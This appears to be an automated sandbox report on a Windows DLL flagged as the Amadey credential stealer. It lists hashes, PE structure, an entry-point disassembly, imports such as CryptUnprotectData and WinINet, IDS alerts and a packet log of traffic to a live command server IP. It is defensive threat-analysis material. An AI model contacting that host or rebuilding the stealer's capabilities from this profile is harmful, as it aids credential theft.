                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.688312828627548
                              TrID:
                              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                              • Generic Win/DOS Executable (2004/3) 0.20%
                              • DOS Executable Generic (2002/1) 0.20%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:0j6nSbUQQS.dll
                              File size:1'073'664 bytes
                              MD5:921b0badeaffee860310e6755769337e
                              SHA1:cfe2dfe5f457383e1723e4423e78620cc9fa8f91
                              SHA256:c9914b4ab252e782b73ab0a3efad386444ba8a8059167adcb0675968da2df36f
                              SHA512:2035442326a8e1f9733fef189cd135ce7b2dd22deda62d74e99ffd7eb83413487b91d72dba47f5512e4adcd45998ff5680a4b75342bba4c43d34186eacce1120
                              SSDEEP:24576:KNFxrUgNQWcPb72kXGWjVcwBlTd8DKT/VSMsCdTzHpgaym9:KNFxogmf2scG1Tzcm9
                              TLSH:8E358E05FA53D0B1D8D420B111B6BBF2597C6639A72445DBAB801FB69E201F33E37B29
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P.hv...%...%...%...$...%...$...%...$...%F..$V..%F..$...%F..$...%...$...%...%...%...$...%...$...%...%...%...$...%Rich...%.......
                              Icon Hash:7ae282899bbab082
                              Entrypoint:0x100bd96e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x10000000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0x671CF632 [Sat Oct 26 14:01:22 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:7e8b0331b68a47254f7000efd39b30a8
                              Instruction
                              push ebp
                              mov ebp, esp
                              cmp dword ptr [ebp+0Ch], 01h
                              jne 00007FA148B6F967h
                              call 00007FA148B6FD4Bh
                              push dword ptr [ebp+10h]
                              push dword ptr [ebp+0Ch]
                              push dword ptr [ebp+08h]
                              call 00007FA148B6F813h
                              add esp, 0Ch
                              pop ebp
                              retn 000Ch
                              and dword ptr [ecx+04h], 00000000h
                              mov eax, ecx
                              and dword ptr [ecx+08h], 00000000h
                              mov dword ptr [ecx+04h], 100E458Ch
                              mov dword ptr [ecx], 100E4584h
                              ret
                              push ebp
                              mov ebp, esp
                              sub esp, 0Ch
                              lea ecx, dword ptr [ebp-0Ch]
                              call 00007FA148B6F93Fh
                              push 100FC7CCh
                              lea eax, dword ptr [ebp-0Ch]
                              push eax
                              call 00007FA148B7177Eh
                              int3
                              push ebp
                              mov ebp, esp
                              and dword ptr [10102004h], 00000000h
                              sub esp, 24h
                              or dword ptr [100FF00Ch], 01h
                              push 0000000Ah
                              call dword ptr [100E41FCh]
                              test eax, eax
                              je 00007FA148B6FB0Fh
                              and dword ptr [ebp-10h], 00000000h
                              xor eax, eax
                              push ebx
                              push esi
                              push edi
                              xor ecx, ecx
                              lea edi, dword ptr [ebp-24h]
                              push ebx
                              cpuid
                              mov esi, ebx
                              pop ebx
                              mov dword ptr [edi], eax
                              mov dword ptr [edi+04h], esi
                              mov dword ptr [edi+08h], ecx
                              xor ecx, ecx
                              mov dword ptr [edi+0Ch], edx
                              mov eax, dword ptr [ebp-24h]
                              mov edi, dword ptr [ebp-1Ch]
                              mov dword ptr [ebp-0Ch], eax
                              xor edi, 6C65746Eh
                              mov eax, dword ptr [ebp-18h]
                              xor eax, 49656E69h
                              mov dword ptr [ebp-08h], eax
                              mov eax, dword ptr [ebp-20h]
                              xor eax, 756E6547h
                              mov dword ptr [ebp-04h], eax
                              xor eax, eax
                              inc eax
                              push ebx
                              cpuid
                              Name                                  Virtual Address  Virtual Size  Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT          0xfd0f0          0x58          .rdata
                              IMAGE_DIRECTORY_ENTRY_IMPORT          0xfd148          0x8c          .rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x108000         0xf8          .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x109000         0x6594        .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG           0xfb090          0x38          .rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xfb0c8          0x40          .rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_IAT             0xe4000          0x2ec         .rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                              Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
                              .text   0x1000           0xe2238       0xe2400   99e5affc3acaef7d2e352e81d4b2f84c  False     0.48959556284530387  data       6.619746825575559   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata  0xe4000          0x1a28e       0x1a400   c3d4b18b9adf0d3cbf4e53cc6e8db32d  False     0.49518229166666666  data       6.005708486260768   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data   0xff000          0x8f6c        0x2e00    a80936aea980d02aa77ce23333f781a4  False     0.16542119565217392  data       2.7385220211772183  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc   0x108000         0xf8          0x200     85aa289043231b7c2569f657c5abeefe  False     0.3359375            data       2.5259174608280497  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc  0x109000         0x6594        0x6600    09201ee0b3ef9165a1f0602fb5a08b17  False     0.7370174632352942   data       6.676014162786475   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              Name         RVA       Size  Type                                                      Language  Country        ZLIB Complexity
                              RT_MANIFEST  0x108060  0x91  XML 1.0 document, ASCII text, with CRLF line terminators  English   United States  0.8689655172413793
                              DLL           Import
                              CRYPT32.dll   CryptUnprotectData
                              KERNEL32.dll  GetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, CreateMutexW, WaitForSingleObject, CreateFileW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, MultiByteToWideChar, Sleep, GetTempPathA, FormatMessageW, GetDiskFreeSpaceA, GetLastError, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, CreateFileA, LoadLibraryA, WaitForSingleObjectEx, DeleteFileA, DeleteFileW, HeapReAlloc, CloseHandle, GetSystemInfo, LoadLibraryW, HeapAlloc, HeapCompact, HeapDestroy, UnlockFile, GetProcAddress, CreateFileMappingA, LocalFree, LockFileEx, GetFileSize, DeleteCriticalSection, GetCurrentProcessId, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, WideCharToMultiByte, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, CreateFileMappingW, MapViewOfFile, QueryPerformanceCounter, GetTickCount, FlushFileBuffers, SetHandleInformation, FindFirstFileA, Wow64DisableWow64FsRedirection, K32GetModuleFileNameExW, FindNextFileA, CreatePipe, PeekNamedPipe, lstrlenA, FindClose, GetCurrentDirectoryA, lstrcatA, OpenProcess, SetCurrentDirectoryA, CreateToolhelp32Snapshot, ProcessIdToSessionId, CopyFileA, Wow64RevertWow64FsRedirection, Process32NextW, Process32FirstW, CreateThread, CreateProcessA, CreateDirectoryA, ReadConsoleW, InitializeCriticalSection, LeaveCriticalSection, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, GetFullPathNameW, EnterCriticalSection, HeapFree, HeapCreate, TryEnterCriticalSection, ReadFile, AreFileApisANSI, SetFilePointer, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetStdHandle, GetCurrentDirectoryW, GetStdHandle, GetTimeZoneInformation, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InitializeSListHead, LCMapStringEx, InitializeCriticalSectionEx, EncodePointer, DecodePointer, CompareStringEx, GetCPInfo, GetStringTypeW, RaiseException, InterlockedFlushSList, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ExitProcess, GetModuleFileNameW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, WriteConsoleW
                              ADVAPI32.dll  GetSidSubAuthority, RegEnumValueW, RegEnumKeyA, RegCloseKey, RegQueryInfoKeyW, RegOpenKeyA, RegQueryValueExA, GetSidSubAuthorityCount, RegOpenKeyExA, GetUserNameA, RegEnumKeyExW, LookupAccountNameA, GetSidIdentifierAuthority
                              SHELL32.dll   SHFileOperationA, SHGetFolderPathA
                              WININET.dll   HttpOpenRequestA, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, HttpAddRequestHeadersA, HttpSendRequestExW, HttpEndRequestA, InternetOpenW, InternetWriteFile
                              bcrypt.dll    BCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptGenerateSymmetricKey, BCryptDecrypt
                              Name  Ordinal  Address
                              Main  1        0x100afc10
                              Save  2        0x100045b0
                              Language of compilation system  Country where language is spoken  Map
                              English                         United States
                              Timestamp                        SID      Signature                                              Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
                              2024-10-27T17:47:06.264568+0100  2855239  ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)  1         192.168.2.4  49731        185.215.113.217  80         TCP
                              2024-10-27T17:47:06.286598+0100  2855239  ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)  1         192.168.2.4  49730        185.215.113.217  80         TCP
                              2024-10-27T17:47:12.415664+0100  2855239  ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)  1         192.168.2.4  49732        185.215.113.217  80         TCP
                              Timestamp  Source Port  Dest Port  Source IP  Dest IP
                              Oct 27, 2024 17:47:23.438225031 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438230991 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.438241005 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438261986 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.438286066 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438288927 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.438352108 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438352108 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438395023 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438535929 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438561916 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438635111 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438711882 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438711882 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438793898 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438829899 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438920021 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438945055 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.438999891 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439018965 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439065933 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439120054 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439317942 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439367056 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439394951 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439459085 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439459085 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439503908 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439546108 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439596891 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439694881 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439743996 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439790010 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439867020 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439897060 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.439944983 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440051079 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440052032 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440099955 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440258980 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440258980 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440337896 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440337896 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440680027 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440731049 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440764904 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440875053 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440892935 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440892935 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440892935 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440892935 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440908909 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.440946102 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.441041946 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.441054106 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.441091061 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.441127062 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.441139936 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.443124056 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443152905 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443178892 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443228006 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443255901 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443284035 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443310976 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443358898 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443386078 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443434000 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443461895 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443541050 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443567991 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443594933 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443623066 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443681955 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443710089 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443737984 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443789959 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443816900 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443844080 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443891048 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.443917036 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.444005013 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.444067955 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.444094896 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445945024 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.445997000 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446022987 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446060896 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446060896 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446091890 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446122885 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446199894 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446233988 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446233988 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446239948 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446259022 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446285963 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446335077 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446335077 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446388006 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.446388006 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447261095 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447338104 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447365046 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447427034 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447427034 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447494030 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447494030 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447545052 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447585106 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447612047 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447691917 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447787046 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447834969 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447937965 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.447962046 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448002100 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448081017 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448112011 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448152065 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448203087 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448235035 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448280096 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448328972 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448379040 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448379040 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448381901 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448410988 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448437929 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448465109 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448493004 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448520899 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448546886 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448596954 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448623896 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448652983 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.448662996 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448745966 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448745966 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448788881 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448821068 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448875904 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448875904 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448916912 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.448941946 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449065924 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449120045 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449145079 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449244976 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449291945 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449315071 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449395895 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449438095 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449470043 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449547052 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449578047 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449640036 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449660063 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449703932 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449942112 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449942112 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.449982882 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450018883 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450074911 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450092077 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450131893 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450166941 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450283051 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450352907 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450352907 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450439930 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450469971 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450517893 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450589895 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450634003 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450726986 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450753927 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450817108 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450817108 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450889111 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.450889111 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451097965 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451155901 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451155901 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451225042 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451225042 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451266050 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451308966 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451333046 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451374054 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.451384068 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451488018 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451524019 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.451529980 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451550961 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.451570988 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451601028 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.451627970 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.451654911 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.451690912 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451747894 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.451751947 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451802015 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451877117 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451878071 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.451920033 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.451982975 CET4973180192.168.2.4185.215.113.217
                              Oct 27, 2024 17:47:23.452035904 CET8049731185.215.113.217192.168.2.4
                              Oct 27, 2024 17:47:23.452049971 CET4973180192.168.2.4185.215.113.217
